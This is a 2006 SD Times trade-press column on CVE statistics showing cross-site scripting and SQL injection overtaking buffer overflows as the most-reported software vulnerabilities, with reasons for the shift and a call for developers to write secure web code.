LOGIN | REGISTER NOW | SUBSCRIBE
 
 
News on Monday
more>>
SharePoint Tech Report
more>>


   

 
 
Download Current Issue
ISSUE 7/1/2009 PDF

Need Back Issues?
DOWNLOAD HERE

Receive the print Edition?


 
Is the mystery Borland suitor Serena?
Borland software is considering an offer from another company after a preliminary deal with MicroFocus. Is Serena the new company?
06/30/2009 01:55 PM EST

Windows 7 - An eBayer's dream product?
Windows 7 pre-orders can make people money on eBay.
06/29/2009 03:48 PM EST

Know thine cloud provider
Cloud computing require companies to understand compliance and regulation. Third parties will play a big role in regulated industries.
06/29/2009 02:58 PM EST

 

Microsoft Worldwide Partner Conf.
7/13/2009 to 7/16/2009
New Orleans
Microsoft

OSCON (Open Source Convention)
7/20/2009 to 7/24/2009
San Jose
O'Reilly Media

XBRL Technology Workshop & Summit
7/28/2009 to 7/30/2009
Santa Clara
XBRL US

ACM SIGGRAPH
8/3/2009 to 8/7/2009
New Orleans
ACM SIGGRAPH

OpenSource World (formerly LinuxWorld)
8/12/2009 to 8/13/2009
San Francisco
IDG World Expo


 
print Printable version 
Most Read Latest News Blog Resources
Kapow automates website data retrieval
Kapow Technology's Web Data Server 7.0 can be used to create modules that navigate through...

Oracle's Fusion 11g lays groundwork for ERP platform
Fusion's components are standards-based and integrated, but some abilities are lost if non...

COBOL’s future lies in the clouds
After 50 years of use in businesses, COBOL is still lingering around mainframes. But the s...

Digg!  Digg
Reddit  Reddit
Slashdot  Slashdot
Share on facebook  Facebook
Share on Twitter  Twitter

The Rise of Cross-Site Scripting


By Brian Chess
November 15, 2006 — 
Word is that next year Toyota will sell more vehicles than General Motors. This really shouldn’t come as too much of a surprise; Toyota has been turning a larger profit than GM for quite a while now. Still, it will be the first time in 80 years that GM hasn’t been on top. The world is not what it once was.

It turns out that something very similar has happened with software vulnerabilities.

Since the dawn of the Internet, the buffer overflow has been king. The Morris worm (the first worm seen on the Internet) exploited a buffer overflow in sendmail as one of its methods of propagation, and buffer overflows have dominated the vulnerability landscape ever since.

Well, until 2005 anyway. Steve Christey, one of the maintainers of the CVE database (cve.mitre.org), reports that in 2005, the most-reported vulnerability was cross-site scripting. Not only that, but buffer overflow wasn’t even in second place. The lineup in 2005 looked like this:

1. Cross-Site Scripting (16.0 percent)

2. SQL Injection (12.9 percent)

3. Buffer Overflow (9.8 percent)

2006 is shaping up to be even worse for the venerable buffer overflow; it’s on track to fall out of the top three:

1. Cross-Site Scripting (21.5 percent)

2. SQL Injection (14.0 percent)

3. PHP remote includes (9.5 percent)

Why such a dramatic change in software vulnerabilities? There are four things going on.

First, Web vulnerabilities are easy to find. Firewalls and intrusion detection systems don’t usually look at Web traffic, and most Web sites are quite content to allow you to poke at them until you’ve found the vulnerability you want. Attackers use tools to automatically scan sites for vulnerabilities.

Second, Web vulnerabilities are easier to exploit. In most cases, it’s a lot easier to develop a working exploit for a Web vulnerability than it is to write some robust shell code to exploit a buffer overflow.

Third, there are valuable things on the Web. Every day there are more sites, more services, more transactions and more traffic on the Web. You could find plenty of cross-site scripting vulnerabilities in 1998 too, but there wasn’t so much to gain by exploiting them. There weren’t enough sites holding valuable data, and there weren’t enough visitors to make real money exploiting Web vulnerabilities.

Finally, it takes time and concerted effort to write Web applications that don’t contain vulnerabilities. PHP makes it easy to accidentally allow cross-site scripting, SQL injection or remote attacks. Languages such as Java and C# make buffer overflow a vanishing possibility, and they even provide all the tools you need to avoid SQL injection, but they still make cross-site scripting hard to avoid.

To make matters worse, we still haven’t made progress toward eliminating buffer overflows. Christey’s data shows that the number of buffer overflow reports is holding steady at between 250 and 450 per year. Web vulnerabilities, on the other hand, have skyrocketed beginning in 2003. (In total, there were three times as many vulnerabilities reported in 2005 as there were in 2001.)

If there’s one lesson to be taken away from this data, it’s this: You can no longer write a Web application without thinking about security. Programmers need to understand that their code isn’t complete until it’s secure.

Brian Chess is chief scientist at Fortify Software.


Share this link: http://www.sdtimes.com/link/29764
 

Add comment


Name*
Email*  
Country     


  • Comment
  • Preview
Loading